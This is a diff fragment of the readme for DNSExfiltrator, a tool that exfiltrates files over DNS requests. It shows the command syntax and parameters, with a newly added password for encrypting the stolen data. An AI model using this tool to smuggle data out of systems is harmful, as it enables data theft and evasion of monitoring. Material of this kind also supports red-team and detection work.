Arno0x/DNSExfiltrator/readme.md

 dnsExfiltrator.exe <file> <domainName> <password> [s=DNS_server] [t=throttleTime] [r=requestMaxSize] [l=labelMaxSize]
       file:           [MANDATORY] The file name to the file to be exfiltrated.
       domainName:     [MANDATORY] The domain name to use for DNS requests.
+      password:       [MANDATORY] Password used to encrypt the data to be exfiltrated.
       DNS_Server:     [OPTIONNAL] The DNS server name or IP to use for DNS requests.
 Defaults to the system one.
       throttleTime:   [OPTIONNAL] The time in milliseconds to wait between each DNS request.
       requestMaxSize: [OPTIONNAL] The maximum size in bytes for each DNS request.
 Defaults to 255 bytes..